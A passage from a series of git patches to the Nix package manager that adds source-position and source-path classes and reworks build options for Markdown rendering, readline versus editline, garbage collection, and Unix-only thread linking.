+Pos::Pos(const Pos * other) +{ + if (!other) { + return; + } + line = other->line; + column = 
other->column; + origin = std::move(other->origin); +} + +Pos::operator std::shared_ptr() const +{ + return std::make_shared(&*this); +} + +bool Pos::operator<(const Pos &rhs) const +{ + return std::forward_as_tuple(line, column, origin) + < std::forward_as_tuple(rhs.line, rhs.column, rhs.origin); +} + +std::optional Pos::getCodeLines() const +{ + if (line == 0) + return std::nullopt; + + if (auto source = getSource()) { + + std::istringstream iss(*source); + // count the newlines. + int count = 0; + std::string curLine; + int pl = line - 1; + + LinesOfCode loc; + + do { + std::getline(iss, curLine); + ++count; + if (count < pl) + ; + else if (count == pl) { + loc.prevLineOfCode = curLine; + } else if (count == pl + 1) { + loc.errLineOfCode = curLine; + } else if (count == pl + 2) { + loc.nextLineOfCode = curLine; + break; + } + + if (!iss.good()) + break; + } while (true); + + return loc; + } + + return std::nullopt; +} + + +std::optional Pos::getSource() const +{ + return std::visit(overloaded { + [](const std::monostate &) -> std::optional { + return std::nullopt; + }, + [](const Pos::Stdin & s) -> std::optional { + // Get rid of the null terminators added by the parser. + return std::string(s.source->c_str()); + }, + [](const Pos::String & s) -> std::optional { + // Get rid of the null terminators added by the parser. 
+ return std::string(s.source->c_str()); + }, + [](const SourcePath & path) -> std::optional { + try { + return path.readFile(); + } catch (Error &) { + return std::nullopt; + } + } + }, origin); +} + +void Pos::print(std::ostream & out, bool showOrigin) const +{ + if (showOrigin) { + std::visit(overloaded { + [&](const std::monostate &) { out << "«none»"; }, + [&](const Pos::Stdin &) { out << "«stdin»"; }, + [&](const Pos::String & s) { out << "«string»"; }, + [&](const SourcePath & path) { out << path; } + }, origin); + out << ":"; + } + out << line; + if (column > 0) + out << ":" << column; +} + +std::ostream & operator<<(std::ostream & str, const Pos & pos) +{ + pos.print(str, true); + return str; +} + +} diff --git a/src/libutil/position.hh b/src/libutil/position.hh new file mode 100644 index 000000000..a184997ed --- /dev/null +++ b/src/libutil/position.hh @@ -0,0 +1,74 @@ +#pragma once +/** + * @file + * + * @brief Pos and AbstractPos + */ + +#include +#include + +#include "source-path.hh" + +namespace nix { + +/** + * A position and an origin for that position (like a source file). 
+ */ +struct Pos +{ + uint32_t line = 0; + uint32_t column = 0; + + struct Stdin { + ref source; + bool operator==(const Stdin & rhs) const + { return *source == *rhs.source; } + bool operator!=(const Stdin & rhs) const + { return *source != *rhs.source; } + bool operator<(const Stdin & rhs) const + { return *source < *rhs.source; } + }; + struct String { + ref source; + bool operator==(const String & rhs) const + { return *source == *rhs.source; } + bool operator!=(const String & rhs) const + { return *source != *rhs.source; } + bool operator<(const String & rhs) const + { return *source < *rhs.source; } + }; + + typedef std::variant Origin; + + Origin origin = std::monostate(); + + Pos() { } + Pos(uint32_t line, uint32_t column, Origin origin) + : line(line), column(column), origin(origin) { } + Pos(Pos & other) = default; + Pos(const Pos & other) = default; + Pos(Pos && other) = default; + Pos(const Pos * other); + + explicit operator bool() const { return line > 0; } + + operator std::shared_ptr() const; + + /** + * Return the contents of the source file. 
+ */ + std::optional getSource() const; + + void print(std::ostream & out, bool showOrigin) const; + + std::optional getCodeLines() const; + + bool operator==(const Pos & rhs) const = default; + bool operator!=(const Pos & rhs) const = default; + bool operator<(const Pos & rhs) const; +}; + +std::ostream & operator<<(std::ostream & str, const Pos & pos); + +} diff --git a/src/libutil/ref.hh b/src/libutil/ref.hh index af5f8304c..5d0c3696d 100644 --- a/src/libutil/ref.hh +++ b/src/libutil/ref.hh @@ -1,6 +1,7 @@ #pragma once ///@file +#include #include #include #include diff --git a/src/libstore/repair-flag.hh b/src/libutil/repair-flag.hh similarity index 100% rename from src/libstore/repair-flag.hh rename to src/libutil/repair-flag.hh diff --git a/src/libutil/source-path.cc b/src/libutil/source-path.cc new file mode 100644 index 000000000..d85b0b7fe --- /dev/null +++ b/src/libutil/source-path.cc @@ -0,0 +1,105 @@ +#include "source-path.hh" + +namespace nix { + +std::string_view SourcePath::baseName() const +{ return path.baseName().value_or("source"); } + +SourcePath SourcePath::parent() const +{ + auto p = path.parent(); + assert(p); + return {accessor, std::move(*p)}; +} + +std::string SourcePath::readFile() const +{ return accessor->readFile(path); } + +bool SourcePath::pathExists() const +{ return accessor->pathExists(path); } + +InputAccessor::Stat SourcePath::lstat() const +{ return accessor->lstat(path); } + +std::optional SourcePath::maybeLstat() const +{ return accessor->maybeLstat(path); } + +InputAccessor::DirEntries SourcePath::readDirectory() const +{ return accessor->readDirectory(path); } + +std::string SourcePath::readLink() const +{ return accessor->readLink(path); } + +void SourcePath::dumpPath( + Sink & sink, + PathFilter & filter) const +{ return accessor->dumpPath(path, sink, filter); } + +std::optional SourcePath::getPhysicalPath() const +{ return accessor->getPhysicalPath(path); } + +std::string SourcePath::to_string() const +{ return 
accessor->showPath(path); } + +SourcePath SourcePath::operator+(const CanonPath & x) const +{ return {accessor, path + x}; } + +SourcePath SourcePath::operator+(std::string_view c) const +{ return {accessor, path + c}; } + +bool SourcePath::operator==(const SourcePath & x) const +{ + return std::tie(*accessor, path) == std::tie(*x.accessor, x.path); +} + +bool SourcePath::operator!=(const SourcePath & x) const +{ + return std::tie(*accessor, path) != std::tie(*x.accessor, x.path); +} + +bool SourcePath::operator<(const SourcePath & x) const +{ + return std::tie(*accessor, path) < std::tie(*x.accessor, x.path); +} + +SourcePath SourcePath::resolveSymlinks() const +{ + auto res = SourcePath(accessor); + + int linksAllowed = 1024; + + std::list todo; + for (auto & c : path) + todo.push_back(std::string(c)); + + while (!todo.empty()) { + auto c = *todo.begin(); + todo.pop_front(); + if (c == "" || c == ".") + ; + else if (c == "..") + res.path.pop(); + else { + res.path.push(c); + if (auto st = res.maybeLstat(); st && st->type == InputAccessor::tSymlink) { + if (!linksAllowed--) + throw Error("infinite symlink recursion in path '%s'", path); + auto target = res.readLink(); + res.path.pop(); + if (hasPrefix(target, "/")) + res.path = CanonPath::root; + todo.splice(todo.begin(), tokenizeString>(target, "/")); + } + } + } + + return res; +} + +std::ostream & operator<<(std::ostream & str, const SourcePath & path) +{ + str << path.to_string(); + return str; +} + +} diff --git a/src/libutil/source-path.hh b/src/libutil/source-path.hh new file mode 100644 index 000000000..bf5625ca5 --- /dev/null +++ b/src/libutil/source-path.hh @@ -0,0 +1,114 @@ +#pragma once +/** + * @file + * + * @brief SourcePath + */ + +#include "ref.hh" +#include "canon-path.hh" +#include "input-accessor.hh" + +namespace nix { + +/** + * An abstraction for accessing source files during + * evaluation. 
Currently, it's just a wrapper around `CanonPath` that + * accesses files in the regular filesystem, but in the future it will + * support fetching files in other ways. + */ +struct SourcePath +{ + ref accessor; + CanonPath path; + + SourcePath(ref accessor, CanonPath path = CanonPath::root) + : accessor(std::move(accessor)) + , path(std::move(path)) + { } + + std::string_view baseName() const; + + /** + * Construct the parent of this `SourcePath`. Aborts if `this` + * denotes the root. + */ + SourcePath parent() const; + + /** + * If this `SourcePath` denotes a regular file (not a symlink), + * return its contents; otherwise throw an error. + */ + std::string readFile() const; + + /** + * Return whether this `SourcePath` denotes a file (of any type) + * that exists + */ + bool pathExists() const; + + /** + * Return stats about this `SourcePath`, or throw an exception if + * it doesn't exist. + */ + InputAccessor::Stat lstat() const; + + /** + * Return stats about this `SourcePath`, or std::nullopt if it + * doesn't exist. + */ + std::optional maybeLstat() const; + + /** + * If this `SourcePath` denotes a directory (not a symlink), + * return its directory entries; otherwise throw an error. + */ + InputAccessor::DirEntries readDirectory() const; + + /** + * If this `SourcePath` denotes a symlink, return its target; + * otherwise throw an error. + */ + std::string readLink() const; + + /** + * Dump this `SourcePath` to `sink` as a NAR archive. + */ + void dumpPath( + Sink & sink, + PathFilter & filter = defaultPathFilter) const; + + /** + * Return the location of this path in the "real" filesystem, if + * it has a physical location. + */ + std::optional getPhysicalPath() const; + + std::string to_string() const; + + /** + * Append a `CanonPath` to this path. + */ + SourcePath operator + (const CanonPath & x) const; + + /** + * Append a single component `c` to this path. `c` must not + * contain a slash. A slash is implicitly added between this path + * and `c`. 
+ */ + SourcePath operator+(std::string_view c) const; + bool operator==(const SourcePath & x) const; + bool operator!=(const SourcePath & x) const; + bool operator<(const SourcePath & x) const; + + /** + * Resolve any symlinks in this `SourcePath` (including its + * parents). The result is a `SourcePath` in which no element is a + * symlink. + */ + SourcePath resolveSymlinks() const; +}; + +std::ostream & operator << (std::ostream & str, const SourcePath & path); + +} From bbd0a959e17e988ef1ec2fadd1ab5bb66420fd6f Mon Sep 17 00:00:00 2001 From: Weijia Wang <9713184+wegank@users.noreply.github.com> Date: Mon, 8 Jan 2024 20:37:42 +0100 Subject: [PATCH 207/654] Make lowdown optional Co-authored-by: John Ericson --- configure.ac | 16 +++++++++++++++- package.nix | 5 +++++ src/libcmd/markdown.cc | 6 ++++++ 3 files changed, 26 insertions(+), 1 deletion(-) diff --git a/configure.ac b/configure.ac index b97e25bbd..929750932 100644 --- a/configure.ac +++ b/configure.ac @@ -374,7 +374,21 @@ PKG_CHECK_MODULES([NLOHMANN_JSON], [nlohmann_json >= 3.9]) # Look for lowdown library. -PKG_CHECK_MODULES([LOWDOWN], [lowdown >= 0.9.0], [CXXFLAGS="$LOWDOWN_CFLAGS $CXXFLAGS"]) +AC_ARG_ENABLE([markdown], AS_HELP_STRING([--enable-markdown], [Enable Markdown rendering in the Nix binary (requires lowdown) [default=auto]]), + enable_markdown=$enableval, enable_markdown=auto) +AS_CASE(["$enable_markdown"], + [yes | auto], [ + PKG_CHECK_MODULES([LOWDOWN], [lowdown >= 0.9.0], [ + CXXFLAGS="$LOWDOWN_CFLAGS $CXXFLAGS" + have_lowdown=1 + AC_DEFINE(HAVE_LOWDOWN, 1, [Whether lowdown is available and should be used for Markdown rendering.]) + ], [ + AS_IF([test "x$enable_markdown" == "xyes"], [AC_MSG_ERROR([--enable-markdown was specified, but lowdown was not found.])]) + ]) + ], + [no], [have_lowdown=], + [AC_MSG_ERROR([--enable-markdown must be one of: yes, no, auto])]) +AC_SUBST(HAVE_LOWDOWN, [$have_lowdown]) # Look for libgit2. 
diff --git a/package.nix b/package.nix index dfebdb0e4..dd37809d0 100644 --- a/package.nix +++ b/package.nix @@ -68,6 +68,9 @@ # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled +# Whether to enable Markdown rendering in the Nix binary. +, enableMarkdown ? !stdenv.hostPlatform.isWindows + # Whether to compile `rl-next.md`, the release notes for the next # not-yet-released version of Nix in the manul, from the individual # change log entries in the directory. @@ -213,6 +216,7 @@ in { xz ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ editline + ] ++ lib.optionals enableMarkdown [ lowdown ] ++ lib.optionals buildUnitTests [ gtest @@ -269,6 +273,7 @@ in { (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") + (lib.enableFeature enableMarkdown "markdown") (lib.enableFeature installUnitTests "install-unit-tests") ] ++ lib.optionals (!forDevShell) [ "--sysconfdir=/etc" diff --git a/src/libcmd/markdown.cc b/src/libcmd/markdown.cc index 8b3bbc1b5..a4e3c5a77 100644 --- a/src/libcmd/markdown.cc +++ b/src/libcmd/markdown.cc @@ -4,12 +4,15 @@ #include "terminal.hh" #include +#if HAVE_LOWDOWN #include +#endif namespace nix { std::string renderMarkdownToTerminal(std::string_view markdown) { +#if HAVE_LOWDOWN int windowWidth = getWindowSize().second; struct lowdown_opts opts { @@ -48,6 +51,9 @@ std::string renderMarkdownToTerminal(std::string_view markdown) throw Error("allocation error while rendering Markdown"); return filterANSIEscapes(std::string(buf->data, buf->size), !shouldANSI()); +#else + return std::string(markdown); +#endif } } From 29eb5ed1dc54ec45ab23b50ef259d2b370e8b1e8 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 8 Jan 2024 14:47:42 -0500 Subject: [PATCH 208/654] Fix Internal API docs Because of source filtering, they were empty. 
Fixes #9694 --- package.nix | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/package.nix b/package.nix index dfebdb0e4..aad022b32 100644 --- a/package.nix +++ b/package.nix @@ -164,6 +164,10 @@ in { ./doc/manual ] ++ lib.optionals enableInternalAPIDocs [ ./doc/internal-api + # Source might not be compiled, but still must be available + # for Doxygen to gather comments. + ./src + ./tests/unit ] ++ lib.optionals buildUnitTests [ ./tests/unit ] ++ lib.optionals doInstallCheck [ From 3d9e0c60e4cf135943d2c72a990ff2c0e3e311a7 Mon Sep 17 00:00:00 2001 From: DavHau Date: Tue, 9 Jan 2024 18:36:09 +0700 Subject: [PATCH 209/654] gitignore: add result-* --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index d9f9d949b..a47b195bb 100644 --- a/.gitignore +++ b/.gitignore @@ -141,6 +141,7 @@ compile_commands.json nix-rust/target result +result-* # IDE .vscode/ From 2cea88dbc8c277d7403e6dd65f482fd2eb931e52 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 15:56:37 -0400 Subject: [PATCH 210/654] Improve build sytem support for readline instead of editline Changes: - CPP variable is now `USE_READLINE` not `READLINE` - `configure.ac` supports with new CLI flag - `package.nix` supports with new configuration option - `flake.nix` CIs this (along with no markdown) Remove old Ubuntu 16.04 stop-gap too, as that is now quite old. Motivation: - editline does not build for Windows, but readline *should*. (I am still working on this in Nixpkgs at this time, however. So there will be a follow-up Nix PR removing the windows-only skipping of the readline library once I am done.) - Per https://salsa.debian.org/debian/nix/-/blob/master/debian/rules?ref_type=heads#L27 and #2551, Debian builds Nix with readline. Now we better support and CI that build configuration. This is picking up where #2551 left off, ensuring we test a few more things not merely have CPP for them. 
Co-authored-by: Weijia Wang <9713184+wegank@users.noreply.github.com> --- configure.ac | 29 ++++++++++++++++++----------- flake.nix | 9 +++++++++ package.nix | 12 +++++++++++- src/libcmd/repl.cc | 6 +++--- 4 files changed, 41 insertions(+), 15 deletions(-) diff --git a/configure.ac b/configure.ac index fdbb2629e..2594544ab 100644 --- a/configure.ac +++ b/configure.ac @@ -251,17 +251,25 @@ PKG_CHECK_MODULES([SQLITE3], [sqlite3 >= 3.6.19], [CXXFLAGS="$SQLITE3_CFLAGS $CX # Look for libcurl, a required dependency. PKG_CHECK_MODULES([LIBCURL], [libcurl], [CXXFLAGS="$LIBCURL_CFLAGS $CXXFLAGS"]) -# Look for editline, a required dependency. +# Look for editline or readline, a required dependency. # The the libeditline.pc file was added only in libeditline >= 1.15.2, # see https://github.com/troglobit/editline/commit/0a8f2ef4203c3a4a4726b9dd1336869cd0da8607, -# but e.g. Ubuntu 16.04 has an older version, so we fall back to searching for -# editline.h when the pkg-config approach fails. -PKG_CHECK_MODULES([EDITLINE], [libeditline], [CXXFLAGS="$EDITLINE_CFLAGS $CXXFLAGS"], [ - AC_CHECK_HEADERS([editline.h], [true], - [AC_MSG_ERROR([Nix requires libeditline; it was found neither via pkg-config nor its normal header.])]) - AC_SEARCH_LIBS([readline read_history], [editline], [], - [AC_MSG_ERROR([Nix requires libeditline; it was not found via pkg-config, but via its header, but required functions do not work. Maybe it is too old? >= 1.14 is required.])]) -]) +# Older versions are no longer supported. 
+AC_ARG_WITH( + [readline-flavor], + AS_HELP_STRING([--with-readline-flavor],[Which library to use for nice line editting with the Nix language REPL" [default=editline]]), + [readline_flavor=$withval], + [readline_flavor=editline]) +AS_CASE(["$readline_flavor"], + [editline], [ + readline_flavor_pc=libeditline + ], + [readline], [ + readline_flavor_pc=readline + AC_DEFINE([USE_READLINE], [1], [Use readline instead of editline]) + ], + [AC_MSG_ERROR([bad value "$readline_flavor" for --with-readline-flavor, must be one of: editline, readline])]) +PKG_CHECK_MODULES([EDITLINE], [$readline_flavor_pc], [CXXFLAGS="$EDITLINE_CFLAGS $CXXFLAGS"]) # Look for libsodium. PKG_CHECK_MODULES([SODIUM], [libsodium], [CXXFLAGS="$SODIUM_CFLAGS $CXXFLAGS"]) @@ -387,8 +395,7 @@ AS_CASE(["$enable_markdown"], ]) ], [no], [have_lowdown=], - [AC_MSG_ERROR([--enable-markdown must be one of: yes, no, auto])]) -AC_SUBST(HAVE_LOWDOWN, [$have_lowdown]) + [AC_MSG_ERROR([bad value "$enable_markdown" for --enable-markdown, must be one of: yes, no, auto])]) # Look for libgit2. diff --git a/flake.nix b/flake.nix index 32354a88f..c7aee7541 100644 --- a/flake.nix +++ b/flake.nix @@ -230,6 +230,15 @@ } ); + # Toggles some settings for better coverage. Windows needs these + # library combinations, and Debian build Nix with GNU readline too. + buildReadlineNoMarkdown = forAllSystems (system: + self.packages.${system}.nix.override { + enableMarkdown = false; + readlineFlavor = "readline"; + } + ); + # Perl bindings for various platforms. perlBindings = forAllSystems (system: nixpkgsFor.${system}.native.nix.perl-bindings); diff --git a/package.nix b/package.nix index 727f5e646..d0b9fc3f3 100644 --- a/package.nix +++ b/package.nix @@ -13,6 +13,7 @@ , changelog-d , curl , editline +, readline , fileset , flex , git @@ -71,6 +72,14 @@ # Whether to enable Markdown rendering in the Nix binary. , enableMarkdown ? !stdenv.hostPlatform.isWindows +# Which interactive line editor library to use for Nix's repl. 
+# +# Currently supported choices are: +# +# - editline (default) +# - readline +, readlineFlavor ? if stdenv.hostPlatform.isWindows then "readline" else "editline" + # Whether to compile `rl-next.md`, the release notes for the next # not-yet-released version of Nix in the manul, from the individual # change log entries in the directory. @@ -219,7 +228,7 @@ in { sqlite xz ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ - editline + ({ inherit readline editline; }.${readlineFlavor}) ] ++ lib.optionals enableMarkdown [ lowdown ] ++ lib.optionals buildUnitTests [ @@ -279,6 +288,7 @@ in { (lib.enableFeature enableManual "doc-gen") (lib.enableFeature enableMarkdown "markdown") (lib.enableFeature installUnitTests "install-unit-tests") + (lib.withFeatureAs true "readline-flavor" readlineFlavor) ] ++ lib.optionals (!forDevShell) [ "--sysconfdir=/etc" ] ++ lib.optionals installUnitTests [ diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index dea91ba63..9c92f2b6e 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -5,7 +5,7 @@ #include -#ifdef READLINE +#ifdef USE_READLINE #include #include #else @@ -249,14 +249,14 @@ void NixRepl::mainLoop() } catch (SysError & e) { logWarning(e.info()); } -#ifndef READLINE +#ifndef USE_READLINE el_hist_size = 1000; #endif read_history(historyFile.c_str()); auto oldRepl = curRepl; curRepl = this; Finally restoreRepl([&] { curRepl = oldRepl; }); -#ifndef READLINE +#ifndef USE_READLINE rl_set_complete_func(completionCallback); rl_set_list_possib_func(listPossibleCallback); #endif From 0c3ce237549d43de52e897f12e6d6c8ee59ac227 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 9 Jan 2024 17:31:40 -0500 Subject: [PATCH 211/654] Improve the build without GC We don't just want to pass `--enable-gc=no`; we also want to make sure boehmgc is not a dependency. Creating a nix-level configuration option to do both, and then using that for the CI job, is more robust. 
--- flake.nix | 4 +++- package.nix | 12 ++++++++++-- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/flake.nix b/flake.nix index c7aee7541..49f214e72 100644 --- a/flake.nix +++ b/flake.nix @@ -220,7 +220,9 @@ buildCross = forAllCrossSystems (crossSystem: lib.genAttrs ["x86_64-linux"] (system: self.packages.${system}."nix-${crossSystem}")); - buildNoGc = forAllSystems (system: self.packages.${system}.nix.overrideAttrs (a: { configureFlags = (a.configureFlags or []) ++ ["--enable-gc=no"];})); + buildNoGc = forAllSystems (system: + self.packages.${system}.nix.override { enableGC = false; } + ); buildNoTests = forAllSystems (system: self.packages.${system}.nix.override { diff --git a/package.nix b/package.nix index d0b9fc3f3..71ee80e33 100644 --- a/package.nix +++ b/package.nix @@ -69,6 +69,14 @@ # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled +# Whether to use garbage collection for the Nix language evaluator. +# +# If it is disabled, we just leak memory, but this is not as bad as it +# sounds so long as evaluation just takes places within short-lived +# processes. (When the process exits, the memory is reclaimed; it is +# only leaked *within* the process.) +, enableGC ? true + # Whether to enable Markdown rendering in the Nix binary. , enableMarkdown ? 
!stdenv.hostPlatform.isWindows @@ -245,9 +253,8 @@ in { ; propagatedBuildInputs = [ - boehmgc nlohmann_json - ]; + ] ++ lib.optional enableGC boehmgc; dontBuild = !attrs.doBuild; doCheck = attrs.doCheck; @@ -286,6 +293,7 @@ in { (lib.enableFeature doInstallCheck "functional-tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") + (lib.enableFeature enableGC "gc") (lib.enableFeature enableMarkdown "markdown") (lib.enableFeature installUnitTests "install-unit-tests") (lib.withFeatureAs true "readline-flavor" readlineFlavor) From 57dc4fc878bc74dfb38cd9d435a85c560b43cebb Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 2 Sep 2023 16:21:44 -0400 Subject: [PATCH 212/654] Make more expressive `HOST_*` macro system --- mk/lib.mk | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/mk/lib.mk b/mk/lib.mk index 3d503364f..a5a067e48 100644 --- a/mk/lib.mk +++ b/mk/lib.mk @@ -14,20 +14,34 @@ install-tests-groups := ifdef HOST_OS HOST_KERNEL = $(firstword $(subst -, ,$(HOST_OS))) + ifeq ($(patsubst mingw%,,$(HOST_KERNEL)),) + HOST_MINGW = 1 + HOST_WINDOWS = 1 + endif ifeq ($(HOST_KERNEL), cygwin) HOST_CYGWIN = 1 + HOST_WINDOWS = 1 + HOST_UNIX = 1 endif ifeq ($(patsubst darwin%,,$(HOST_KERNEL)),) HOST_DARWIN = 1 + HOST_UNIX = 1 endif ifeq ($(patsubst freebsd%,,$(HOST_KERNEL)),) HOST_FREEBSD = 1 + HOST_UNIX = 1 + endif + ifeq ($(patsubst netbsd%,,$(HOST_KERNEL)),) + HOST_NETBSD = 1 + HOST_UNIX = 1 endif ifeq ($(HOST_KERNEL), linux) HOST_LINUX = 1 + HOST_UNIX = 1 endif ifeq ($(patsubst solaris%,,$(HOST_KERNEL)),) HOST_SOLARIS = 1 + HOST_UNIX = 1 endif endif From f9e5eb5f0a61555d24fe85b8edccf49f0b176152 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 10 Jan 2024 20:26:02 -0500 Subject: [PATCH 213/654] Make indentation in makesfiles consistent Tab (as required) for rules, two spaces for `if`...`endif`. 
--- src/libexpr/local.mk | 2 +- src/libstore/local.mk | 12 ++++++------ src/libutil/local.mk | 2 +- tests/functional/local.mk | 10 +++++----- 4 files changed, 13 insertions(+), 13 deletions(-) diff --git a/src/libexpr/local.mk b/src/libexpr/local.mk index ed6bc761a..b60936a0e 100644 --- a/src/libexpr/local.mk +++ b/src/libexpr/local.mk @@ -18,7 +18,7 @@ libexpr_LIBS = libutil libstore libfetchers libexpr_LDFLAGS += -lboost_context -pthread ifdef HOST_LINUX - libexpr_LDFLAGS += -ldl + libexpr_LDFLAGS += -ldl endif # The dependency on libgc must be propagated (i.e. meaning that diff --git a/src/libstore/local.mk b/src/libstore/local.mk index 675976314..f447e190d 100644 --- a/src/libstore/local.mk +++ b/src/libstore/local.mk @@ -16,15 +16,15 @@ endif $(foreach file,$(libstore_FILES),$(eval $(call install-data-in,$(d)/$(file),$(datadir)/nix/sandbox))) ifeq ($(ENABLE_S3), 1) - libstore_LDFLAGS += -laws-cpp-sdk-transfer -laws-cpp-sdk-s3 -laws-cpp-sdk-core -laws-crt-cpp + libstore_LDFLAGS += -laws-cpp-sdk-transfer -laws-cpp-sdk-s3 -laws-cpp-sdk-core -laws-crt-cpp endif ifdef HOST_SOLARIS - libstore_LDFLAGS += -lsocket + libstore_LDFLAGS += -lsocket endif ifeq ($(HAVE_SECCOMP), 1) - libstore_LDFLAGS += $(LIBSECCOMP_LIBS) + libstore_LDFLAGS += $(LIBSECCOMP_LIBS) endif libstore_CXXFLAGS += \ @@ -48,9 +48,9 @@ $(d)/embedded-sandbox-shell.gen.hh: $(sandbox_shell) $(trace-gen) hexdump -v -e '1/1 "0x%x," "\n"' < $< > $@.tmp @mv $@.tmp $@ else -ifneq ($(sandbox_shell),) -libstore_CXXFLAGS += -DSANDBOX_SHELL="\"$(sandbox_shell)\"" -endif + ifneq ($(sandbox_shell),) + libstore_CXXFLAGS += -DSANDBOX_SHELL="\"$(sandbox_shell)\"" + endif endif $(d)/local-store.cc: $(d)/schema.sql.gen.hh $(d)/ca-specific-schema.sql.gen.hh diff --git a/src/libutil/local.mk b/src/libutil/local.mk index 0fdebaf5c..6e3d6d052 100644 --- a/src/libutil/local.mk +++ b/src/libutil/local.mk @@ -17,5 +17,5 @@ $(foreach i, $(wildcard $(d)/signature/*.hh), \ ifeq ($(HAVE_LIBCPUID), 1) - libutil_LDFLAGS += -lcpuid + 
libutil_LDFLAGS += -lcpuid endif diff --git a/tests/functional/local.mk b/tests/functional/local.mk index 192e275e3..25fcbcfe7 100644 --- a/tests/functional/local.mk +++ b/tests/functional/local.mk @@ -129,15 +129,15 @@ nix_tests = \ impure-env.sh ifeq ($(HAVE_LIBCPUID), 1) - nix_tests += compute-levels.sh + nix_tests += compute-levels.sh endif ifeq ($(ENABLE_BUILD), yes) - nix_tests += test-libstoreconsumer.sh + nix_tests += test-libstoreconsumer.sh - ifeq ($(BUILD_SHARED_LIBS), 1) - nix_tests += plugins.sh - endif + ifeq ($(BUILD_SHARED_LIBS), 1) + nix_tests += plugins.sh + endif endif $(d)/test-libstoreconsumer.sh.test $(d)/test-libstoreconsumer.sh.test-debug: \ From 423484ad26850046c101affc9ff6ac4c36ccda06 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 9 Jan 2024 12:29:37 -0500 Subject: [PATCH 214/654] Only link with `-pthread` on Unix We don't want this with MinGW. --- mk/libraries.mk | 6 ++++++ src/libcmd/local.mk | 2 +- src/libexpr/local.mk | 2 +- src/libfetchers/local.mk | 2 +- src/libstore/local.mk | 2 +- src/libutil/local.mk | 2 +- src/nix/local.mk | 2 +- tests/functional/test-libstoreconsumer/local.mk | 2 +- tests/unit/libexpr-support/local.mk | 2 +- tests/unit/libstore-support/local.mk | 2 +- tests/unit/libutil-support/local.mk | 2 +- 11 files changed, 16 insertions(+), 10 deletions(-) diff --git a/mk/libraries.mk b/mk/libraries.mk index 1bc73d7f7..515a481f6 100644 --- a/mk/libraries.mk +++ b/mk/libraries.mk @@ -10,6 +10,12 @@ else endif endif +ifdef HOST_UNIX + THREAD_LDFLAGS = -pthread +else + THREAD_LDFLAGS = +endif + # Build a library with symbolic name $(1). 
The library is defined by # various variables prefixed by ‘$(1)_’: # diff --git a/src/libcmd/local.mk b/src/libcmd/local.mk index afd35af08..abb7459a7 100644 --- a/src/libcmd/local.mk +++ b/src/libcmd/local.mk @@ -8,7 +8,7 @@ libcmd_SOURCES := $(wildcard $(d)/*.cc) libcmd_CXXFLAGS += -I src/libutil -I src/libstore -I src/libexpr -I src/libmain -I src/libfetchers -libcmd_LDFLAGS = $(EDITLINE_LIBS) $(LOWDOWN_LIBS) -pthread +libcmd_LDFLAGS = $(EDITLINE_LIBS) $(LOWDOWN_LIBS) $(THREAD_LDFLAGS) libcmd_LIBS = libstore libutil libexpr libmain libfetchers diff --git a/src/libexpr/local.mk b/src/libexpr/local.mk index b60936a0e..0c3e36750 100644 --- a/src/libexpr/local.mk +++ b/src/libexpr/local.mk @@ -16,7 +16,7 @@ libexpr_CXXFLAGS += -I src/libutil -I src/libstore -I src/libfetchers -I src/lib libexpr_LIBS = libutil libstore libfetchers -libexpr_LDFLAGS += -lboost_context -pthread +libexpr_LDFLAGS += -lboost_context $(THREAD_LDFLAGS) ifdef HOST_LINUX libexpr_LDFLAGS += -ldl endif diff --git a/src/libfetchers/local.mk b/src/libfetchers/local.mk index 266e7a211..e54db4937 100644 --- a/src/libfetchers/local.mk +++ b/src/libfetchers/local.mk @@ -8,6 +8,6 @@ libfetchers_SOURCES := $(wildcard $(d)/*.cc) libfetchers_CXXFLAGS += -I src/libutil -I src/libstore -libfetchers_LDFLAGS += -pthread $(LIBGIT2_LIBS) -larchive +libfetchers_LDFLAGS += $(THREAD_LDFLAGS) $(LIBGIT2_LIBS) -larchive libfetchers_LIBS = libutil libstore diff --git a/src/libstore/local.mk b/src/libstore/local.mk index f447e190d..f86643849 100644 --- a/src/libstore/local.mk +++ b/src/libstore/local.mk @@ -8,7 +8,7 @@ libstore_SOURCES := $(wildcard $(d)/*.cc $(d)/builtins/*.cc $(d)/build/*.cc) libstore_LIBS = libutil -libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) -pthread +libstore_LDFLAGS += $(SQLITE3_LIBS) $(LIBCURL_LIBS) $(THREAD_LDFLAGS) ifdef HOST_LINUX libstore_LDFLAGS += -ldl endif diff --git a/src/libutil/local.mk b/src/libutil/local.mk index 6e3d6d052..200026c1e 100644 --- a/src/libutil/local.mk +++ 
